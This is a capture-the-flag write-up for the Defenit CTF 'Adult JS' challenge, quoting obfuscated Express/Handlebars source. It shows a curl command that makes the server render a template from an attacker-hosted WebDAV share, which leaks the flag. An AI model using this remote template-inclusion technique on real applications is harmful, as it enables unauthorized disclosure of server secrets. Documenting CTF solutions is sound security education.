Rating: 5.0
Given a huge chunk of source code:
```
const express = require('express');
const child_process = require('child_process');
const fs = require('fs');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');
const assert = require('assert');
const hbs = require('hbs');
const app = express();
const FLAG = fs.readFileSync('./flag').toString();
hbs.registerPartial('FLAG', FLAG);
app.engine('html', hbs.__express);
app.set('view engine', 'html');
var shared = 'ADULT/JS';
app.use(bodyParser.urlencoded({
extended: true
}));
app.use(bodyParser.json());
app.use(cookieParser(shared))
app.get('/', (req, res) => {
res.send('It Works! Test');
});
app.get('/assert', (req, res) => {
assert(req.query.code);
res.end('Success');
});
app.post("/b11a993461d7b578075b91b7a83716e444f5b788f6ab83fcaf8857043e501d59", (req, res) => {
try {
ccb89895c = ~~req.route.abccce745;
d831e9a8b = !req.secure.c47fe290a;
d88099c64 = !req.ips.g1da192b8;
d892c4194 = req.params["icacd6e65"];
ebfc3a2da = req.params["ea11668e6"];
h4ab88f09 = req.ip["a6ba6da09"];
h774a9af1 = [req.query.f4cac3da2];
a63d8887e = 'c8cd0961a';
i606199e5 = 'b1866791b';
ddb64ecbe = Buffer.allocUnsafe(62);
bc8955df0 = {
g563f3740: shared,
a9928c724: this
};
d1112ec75 = 'add19ffe0';
i25dfc5b5 = Buffer.allocUnsafe(11);
i7d8af237 = {
b7431e336: this,
f2237285c: shared
};
hb3d60584 = {
hab2352d6: this,
bf89f18ae: shared
};
d88099c64 = d88099c64.d52434cec
d831e9a8b = d831e9a8b ** d831e9a8b
h4ab88f09 = h4ab88f09["d1506a671"]
ccb89895c = ccb89895c ** ccb89895c
i25dfc5b5 = /bb61465f5/.source + '//' + JSON.stringify(h4ab88f09);
res.attachment(i606199e5);
} catch {
res.end('Error');
}
});
<snip>
app.listen(8081);
```
We can identify that this endpoint allows us to render an arbitrary template:
```
app.post("/61050c6ef9c64583e828ed565ca424b8be3c585d90a77e52a770540eb6d2a020", (req, res) => {
try {
ae97ef205 = req.body.hcda7a4f9;
c43c4f0d2 = req.get("d28c3a2a7");
dd0372ef0 = req.range("g64aa5062");
f71f5ce80 = req.cookies.i77baba57;
ic9e2c145 = req.secure["eb4688e6f"];
fc4ebc0cc = {
b13a9706f: Function,
f635b63db: 15
};
ae9a8c19f = {
h4f3b2aa1: shared,
cf479eeba: this
};
h4a0a676e = Buffer.alloc(26);
h9b2a10f7 = Buffer.allocUnsafe(73);
f8c4d94cc = [
[
[
[{
cbee7d77b: this,
e21888a73: shared
}]
]
]
];
dffbae364 = {
f13828fc5: Function,
cbcc2fbc6: 22
};
ib4cb72c9 = {
hdd2f9aa3: Function,
he404c257: 59
};
hf494292b = 'f7de2a815';
ae9a8c19f = assert(f71f5ce80);
res.render(ae97ef205);
} catch {
res.end('Error');
}
});
```
We can then host `{{> FLAG}}` on a WebDAV server and render it for the flag:
```
$ curl "http://adult-js.ctf.defenit.kr/61050c6ef9c64583e828ed565ca424b8be3c585d90a77e52a770540eb6d2a020" --data "hcda7a4f9=\\\\justins.in@8181\\index" --cookie "i77baba57=a"
Defenit{AuduLt_JS-@_lo7e5_@-b4By-JS__##}
```
